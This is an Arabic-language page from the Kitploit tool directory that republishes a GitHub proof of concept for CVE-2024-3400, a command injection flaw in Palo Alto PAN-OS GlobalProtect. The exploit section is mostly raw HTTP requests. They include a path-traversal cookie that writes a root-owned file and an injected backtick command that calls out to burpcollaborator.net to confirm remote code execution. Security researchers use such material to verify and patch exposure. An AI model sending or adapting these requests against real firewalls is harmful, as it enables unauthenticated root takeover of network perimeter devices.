Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3400 — CVE-2024-3400 PAN-OS: ثغرة حقن أوامر نظام التشغيل في GlobalProtect | Kitploit
أدوات/GitHubGitHub/ihebski/cve-2024-3400
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubihebski/cve-2024-3400

CVE-2024-3400

CVE-2024-3400 PAN-OS: ثغرة حقن أوامر نظام التشغيل في GlobalProtect

عرض المستودع
3452منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3400

CVE-2024-3400 حقن أوامر نظام التشغيل Palo Alto

وصف المُورِّد

ثغرة حقن أوامر في ميزة GlobalProtect من برنامج PAN-OS التابع لشركة Palo Alto Networks لإصدارات محددة من PAN-OS وتكوينات مميزة للميزات قد تمكن مهاجمًا غير مصادق من تنفيذ كود عشوائي بصلاحيات الجذر على جدار الحماية.

استغلال

شكر وتقدير لـ watchtowr labs 🚀

اجتياز المسار / التحقق

طلب HTTP:

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

يجب إنشاء poc.txt تحت هذا المسار /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx بصلاحيات الجذر.

إذا كانت الثغرة موجودة، ستتلقى رمز 403 عند الوصول إلى poc.txt بدلاً من 404.

root@kitploit:~

GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close

التحقق من RCE

يجب تمكين القياس عن بُعد.

يمكنك استخدام Burp Collaborator للتحقق من RCE.

root@kitploit:~

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

المراجع

  • https://security.paloaltonetworks.com/CVE-2024-3400
  • https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
  • https://github.com/h4x0r-dz/CVE-2024-3400
تنزيل الأداة